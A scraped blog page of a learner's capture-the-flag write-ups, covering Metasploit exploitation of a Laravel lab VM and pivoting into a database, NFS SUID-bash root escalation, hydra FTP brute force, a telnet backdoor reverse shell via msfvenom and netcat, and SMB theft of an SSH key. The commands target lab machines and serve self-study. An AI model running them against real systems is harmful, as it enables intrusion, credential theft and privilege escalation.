learningcyber-tom
learningcyber-tom
LearningCyber.tom
6 posts
Personal blog documenting my progress learning Cyber Security
Don't wanna be here? Send us removal request.
Statistics
We looked inside some of the posts by learningcyber-tom and here's what we found interesting.
Average Info
Notes Per Post
1
Likes Per Post
1
Reblog Per Post
0
Reply Per Post
0
Time Between Posts
1 day
Number of Posts By Type
Text
6
Last Seen Tumblr Blogs
pedroloustauphotographie
Pedro Loustau Photographie
270 posts
laylxs-blog
VICIOUS 𝓱𝓮𝓪𝓻𝓽.
28 posts
2xdvisual
2xdvisual Studios
11 posts
mi75
Untitled
0 posts
getsocialcc
Get Social CC
2K posts
Fun Fact
Average visit duration of Tumblr.com is 10 mins and 25 secs.
learningcyber-tom ¡ 3 years ago
Text
Advent of cyber day 9 pivoting
Advent of cyber 2022
Day 9 pivoting
Deploy the attached VM, and wait a few minutes. What ports are open?
Run a quick nmap scan
nmap -sV -sC -F 10.10.98.22
-sV: Probe open ports to determine service/version info
-sC: A simple script scan using the default set of scripts
-F fast scan
80
What framework is the web application developed with?
 This info is at the bottom of the webpage
laravel
What CVE is the application vulnerable to?
in metasploit its in the info section for the exploit
 CVE-2021-3129
What command can be used to upgrade the last opened session to a Meterpreter session?
 sessions -u -1
What file indicates a session has been opened within a Docker container?
 /.dockerenv
What file often contains useful credentials for web applications?
 .env
What database table contains useful credentials?
 users
What is Santa's password?
 p4$$w0rd
What ports are open on the host machine?

What is the root flag?
Pivot! steps
Launch Metasploit
msfconsole
search laraval
Matching Modules
# Name Disclosure Date Rank Check Description
---- --------------- ---- ----- ----------- 0 exploit/unix/http/laravel_token_unserialize_exec 2018-08-07 excellent Yes PHP Laravel Framework token Unserialize Remote Command Execution 1 exploit/multi/php/ignition_laravel_debug_rce 2021-01-13 excellent Yes Unauthenticated remote code execution in Ignition
info 1
Description: Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.
use 1
msf6 exploit(multi/php/ignition_laravel_debug_rce) > set RHOSTS 10.10.98.22
RHOSTS => 10.10.98.22
Check
[] Checking component version to 10.10.98.22:80 [] 10.10.98.22:80 - The target appears to be vulnerable.
To summarise all thats happened so far is after a little enumeration with nmap and looking at the website, we know port 80 is open and the website is made using laravel.
Next we launch Metasploit look for any laravel exploits, check they are suitable then launch them.
show targets
This shows what targets are suitable for this exploit.
Set LHOST 10.10.94.167
ip a will tell you your ip address
run
Command shell session 1 opened (10.10.94.167:4444 -> 10.10.98.22:50682) at 2022-12-14 11:22:47 +0000
whoami
www-data
We have a shell! what we need now is to upgrade it to meterpeter so
background
sessions
Active sessions
Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 shell cmd/unix 10.10.94.167:4444 -> 10.10.98.22:50682 (10.10. 98.22)
sessions -u -1 this upgrades the shell to a meterpeter shell
then to use it sessions -i 2 -i means interact
we now have our meterpeter shell, time to make a native shell
shell
env Show the environment
USER=www-data HOME=/var/www PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/system/bin:/system/sbin:/system/xbin LANG=C PWD=/var/www/html
cd /var/www ls -la
ls -la Long format list (permissions, ownership, size, and modification date) of all files:
total 324 drwxr-xr-x 1 www-data www-data 4096 Sep 13 19:39 . drwxr-xr-x 1 root root 4096 Sep 13 09:45 .. -rw-r--r-- 1 503 staff 868 Sep 12 17:08 .env drwxr-xr-x 1 www-data www-data 4096 Sep 13 16:55 app -rwxr-xr-x 1 www-data www-data 1686 Sep 11 00:44 artisan drwxr-xr-x 1 www-data www-data 4096 Sep 13 16:59 bootstrap -rw-r--r-- 1 www-data www-data 1613 Sep 11 00:44 composer.json -rw-r--r-- 1 www-data www-data 247888 Sep 11 01:01 composer.lock drwxr-xr-x 1 www-data www-data 4096 Sep 13 16:55 config drwxr-xr-x 1 www-data www-data 4096 Sep 13 16:55 database drwxr-xr-x 2 www-data www-data 4096 Sep 13 16:55 html -rw-r--r-- 1 www-data www-data 944 Sep 11 00:44 package.json drwxr-xr-x 1 www-data www-data 4096 Sep 13 16:55 resources drwxr-xr-x 1 www-data www-data 4096 Sep 13 16:55 routes -rw-r--r-- 1 www-data www-data 563 Sep 11 00:44 server.php drwxr-xr-x 1 www-data www-data 4096 Sep 13 16:59 storage drwxr-xr-x 1 www-data www-data 4096 Sep 13 17:04 vendor -rw-r--r-- 1 www-data www-data 559 Sep 11 01:14 webpack.mix.js
weve been told the .env file in docker containers have all the good stuff so
cat .env
APP_NAME=Laravel APP_ENV=local APP_KEY=base64:NEMESCXelEv2iYzbgq3N30b9IAnXzQmR7LnSzt70rso= APP_DEBUG=true APP_URL=http://localhost
LOG_CHANNEL=stack LOG_LEVEL=debug
this is what we want
DB_CONNECTION=pgsql DB_HOST=webservice_database DB_PORT=5432 DB_DATABASE=postgres DB_USERNAME=postgres DB_PASSWORD=postgres
BROADCAST_DRIVER=log CACHE_DRIVER=file QUEUE_CONNECTION=sync SESSION_DRIVER=file SESSION_LIFETIME=120
REDIS_HOST=127.0.0.1 REDIS_PASSWORD=null REDIS_PORT=6379
MAIL_MAILER=smtp MAIL_HOST=smtp.mailtrap.io MAIL_PORT=2525 MAIL_USERNAME=null MAIL_PASSWORD=null MAIL_ENCRYPTION=null MAIL_FROM_ADDRESS=null MAIL_FROM_NAME="${APP_NAME}"
AWS_ACCESS_KEY_ID= AWS_SECRET_ACCESS_KEY= AWS_DEFAULT_REGION=us-east-1 AWS_BUCKET=
PUSHER_APP_ID= PUSHER_APP_KEY= PUSHER_APP_SECRET= PUSHER_APP_CLUSTER=mt1
MIX_PUSHER_APP_KEY="${PUSHER_APP_KEY}" MIX_PUSHER_APP_CLUSTER="${PUSHER_APP_CLUSTER}"
useful info: location of the database - webservice_database password:postgres username:postgres
we need to find out where webservice_database is. To do this
exit to get back to meterperter
resolve webservice_database
Host resolutions
Hostname IP Address -------- ---------- webservice_database 172.28.101.51
create a shell shell This shell doesn’t have much usability, however we are given the info that 172.17.0.1 is a very likely address for the the machine controlling the docker containers. Now the two ip adresses that we have can only be accessed from within the docker container
at this point its worth noting that you can upload tools, such as nmap onto this container to then use. but this is inefficient and prone to failure.
This is where we PIVOT, as in route the traffic from our machine through RHOST
Exit back to meterpreter then background it
Now we need to set up our port forwarding or pivoting in metasploit using the route command
route -h shows all the options
route add 172.28.101.51/32 2
/32 is the subnet for a single ip address - i need to look into subnets the 2 on the end is for session 2 which is our meterpreter shell (which is the initial session) and
route add 172.17.0.1/32 2
so both of these connections will be routed through our original host
route print lets us check all is well
time to access the database
search postgres
we will use schemadump
use 16
msf6 auxiliary(scanner/postgres/postgres_schemadump) > set RHOSTS 172.28.101.51
run
DBName: postgres Tables:
TableName: users_id_seq Columns:
ColumnName: last_value ColumnType: int8 ColumnLength: '8'
ColumnName: log_cnt ColumnType: int8 ColumnLength: '8'
ColumnName: is_called ColumnType: bool ColumnLength: '1'
TableName: users Columns:
ColumnName: id ColumnType: int4 ColumnLength: '4'
ColumnName: username ColumnType: varchar ColumnLength: "-1"
ColumnName: password ColumnType: varchar ColumnLength: "-1"
ColumnName: created_at ColumnType: timestamp ColumnLength: '8'
ColumnName: deleted_at ColumnType: timestamp ColumnLength: '8'
TableName: users_pkey Columns:
ColumnName: id ColumnType: int4 ColumnLength: '4'
now we need to look at the table and pull info off it.
search postgres
the server generic query exploits look promising.
use 11
info
set RHOSTS
set DATABASE postgres this is from the info we've enumerated so far
set SQL “select * from users” this ask to retrieve all information from the users table
run
id username password created_at deleted_at -- -------- -------- ---------- ---------- 1 santa p4$$w0rd 2022-09-13 19:39:51.669279 NIL
We have some credentials time to get to the host, we need to set up a socks proxy to route all traffic through our ‘johnny’so
search socks use 0
msf6 auxiliary(server/socks_proxy) >
make a note of the port being used (1080)
msf6 auxiliary(server/socks_proxy) > run
jobs - checks its running
new tab, metasploit should now be running traffic from kali through the proxy we set up,
curl —proxy socks5://127.0.0.1:1080 http://172.17.0.1
curl: Transfers data from or to a server. Supports most protocols, including HTTP, FTP, and POP3.
this works
now to use proxychains
(vim wasnt working so i used nano)
nano /etc/proxychains4.conf
scroll to the bottom, like when using this previously, set it to socks5 and set port to 1080, now all traffic should route through what we set up in meterpreter.
we can now use proxychains, but the when using nmap have to turn of ping to get it to work.
proxychains nmap -F -sV -sT -Pn 172.17.0.1
this went down and i lost my shell, as this is my third attempt, i’m adding what the video shows from now as i gotta go.
nmap shows ports 22 and 80 open
I’ve redone this and got it working without crashing
port 22 is an ssh port so using metasploit
search ssh_login
use 0
set RHOST 172.17.01 PASSWORD p4$$w0rd USER santa
run
then when this completes,
sessions
we can see there is a new session 3
sessions -i 3
ls
this shows us flag.txt
cat flag.txt
we have our flag
0 notes
learningcyber-tom ¡ 3 years ago
Text
Tumblr media
0 notes
learningcyber-tom ¡ 3 years ago
Text
 Enumerating NFS
Enumerating NFS
Nmap -A -p- 10.10.243.201
Time passes…
7 ports open, port 2049 is the NFS port. 
/usr/sbin/showmount -e 10.10.224.104
This shows the visible share /home on the target machine
mkdir /tmp/mount creates a dir on the local machine to mount the share to.
sudo mount -t nfs 10.10.224.104:home /tmp/mount -no lock
cd /tmp
cd mount
ls 
cappucino the folder inside the share.
cd cappucino
ls not working
find - lists files in the home folder 
.ssh folder has the keys for remote access id_rsa are the keys.
cd ssh
cp id_rsa /root
copy key to home folder
Chmod 600 id_rsa
Get permissions to run file
ssh -i id_rsa [email protected]
This logs us into the machine
Exploiting NFS
The nfs share has root squash, which kills root special permissions.
To gain root access, Get to the mount point
Download the bash.exe to the NFS share
Set shell to be owned by root
sudo chown root bash
Add SUID bit permissions (file permissions rw,etc)
sudo chmod +s bash gives owner permissions 
sudo chmod +x bash makes file executable 
ssh into machine as cappucino
ssh -i id_rsa [email protected]
ls to see bash 
run bash
./bash -p (-p persists the permissions we set)
cd /root
ls
root.txt 
cat “root.txt”
THM{nfs-got-pwned}
0 notes
learningcyber-tom ¡ 3 years ago
Text
Enumerating FTP
nmap -sT -10.10.142.174
shows ports 21 and 80open, 21 is ftp
nmap -A -p21 10.10.142.174
shows vsftpd version of ftp running on machine and anonymous login is allowed. 
ftp 10.10.142.174 
User - anonymous
password no password
ls
PUBLIC_NOTICE.txt
get “PUBLIC_NOTICE”.txt
cat “PUBLIC_NOTICE.txt” on local machine
on local machine
hydra -t4 -l mike -P /usr/share/wordlists/rockyou.txt -vV 10.10.142.174 ftp 
ftp 10.10.142.174
user = mike
password = password
ls
get “ftp.txt”
cat “ftp.txt” on local machine
THM{y0u_g0t_th3_ftp_fl4g}
0 notes
learningcyber-tom ¡ 3 years ago
Text
Enumerating and exploiting telnet
Normal nmap scans come back with nothing use -p-
to scan all ports rather than the first 1000 with -T4
nmap -T4 -p- 10.10.107.245 
this shows port 8012 open
nmap -A -p8012 10.10.107.245
the scan of port 8012 shows the text Skidy’s Backdoor
telnet 10.10.107.245 8012
this connects us to the machine via telnet there is no return input when typing.
on local machine start tcpdump listener to see if we can ping our machine from telnet
sudo tcpdump ip proto \\icmp -ieth0
then send local machine ping from telnet
.RUN ping 10.10.167.83
Ping is recognised, so now i generate a reverse shell payload with msfvenom
msfvenom -p cmd/unix/reverse_netcat lhost=10.10.167.83 iport=4444 R
-p payload
lhost our local host ip
iport the port to listen on 
R export payload in raw format
This generates code on my local machine to copy and insert in telnet after making a netcat listening port  
nc -lup 4444
in telnet .RUN and paste text 
once the shell is received type 
ls
cat “flag.txt” 
fin.
0 notes
learningcyber-tom ¡ 3 years ago
Text
smb enumeration
11 july 2022
nmap -sS 10.10.241.222
A stealth scan of the ip address, which tells me which ports are open and which are running SMB (server block protocol) 
enum4linux -a 10.10.241.222
This is a full basic enumeration scan, which gives lots of info, including the username cactus and the profiles folder in shares.
smbclient //10.10.241.222/profiles -U Anonymous
This connects us to the server, using the username Anonymous - this shows that the shared folder ‘profiles’ is accessible anonymously without a password.
ls - list the contents of folders
The folder ‘working from home information.txt’ is interesting
more “Working From Home Information.txt”
Opens the .txt file 
This points us to look at the .ssh directory
cd “.ssh”
ls
get “id_rsa”
downloads the id_rsa security key to my machine
open new tab, so i’m in my machine 
chmod 600 id_rsa
This changes to permissions of the file, giving me read/write
ssh -i id_rsa [email protected]
I’m now logged into the target as cactus!
ls
this shows one file “smb.txt”
more “smb.txt”
reads THM{smb_is_fun_eh?}
fin 
1 note ¡ View note